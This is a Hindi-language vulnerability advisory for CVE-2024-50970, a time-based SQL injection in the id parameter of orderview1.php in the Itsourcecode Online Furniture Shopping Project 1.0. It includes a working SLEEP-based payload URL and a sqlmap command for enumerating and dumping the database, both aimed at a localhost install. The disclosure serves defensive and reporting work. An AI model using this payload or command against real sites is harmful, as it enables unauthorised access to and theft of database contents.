CVE-2024-50970
विवरण
Itsourcecode Online Furniture Shopping Project 1.0 के orderview1.php में एक SQL इंजेक्शन भेद्यता रिमोट हमलावरों को id पैरामीटर के माध्यम से मनमानी SQL कमांड निष्पादित करने की अनुमति देती है।
भेद्यता प्रकार
SQL इंजेक्शन
उत्पाद विक्रेता
Itsourcecode
प्रभावित उत्पाद कोड बेस:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
प्रभावित घटक:
Itsourcecode Online Furniture Shopping v1.0 orderview1.php पेज में id पैरामीटर के माध्यम से SQL इंजेक्शन के लिए असुरक्षित है।
हमले के वेक्टर:
- एप्लिकेशन को स्थानीय रूप से सेट करें, एक खाता पंजीकृत करें, और नए पंजीकृत खाते से लॉग इन करें।
- अपने ब्राउज़र में निम्नलिखित URL पर जाएँ:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- SQL पेलोड इंजेक्ट करें:
URL में id पैरामीटर को संशोधित करके समय-आधारित SQL इंजेक्शन पेलोड शामिल करें।
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- एप्लिकेशन प्रतिक्रिया देखें:
यदि इंजेक्शन सफल होता है तो पेज को लोड होने में काफी अधिक समय (10 सेकंड) लगना चाहिए, जो पुष्टि करता है कि id पैरामीटर SQL इंजेक्शन के लिए असुरक्षित है।
- अब SQLMap टूल का उपयोग करके आगे शोषण और डेटाबेस डंपिंग के लिए नीचे दिए गए कमांड का उपयोग करें:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
संदर्भ:
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection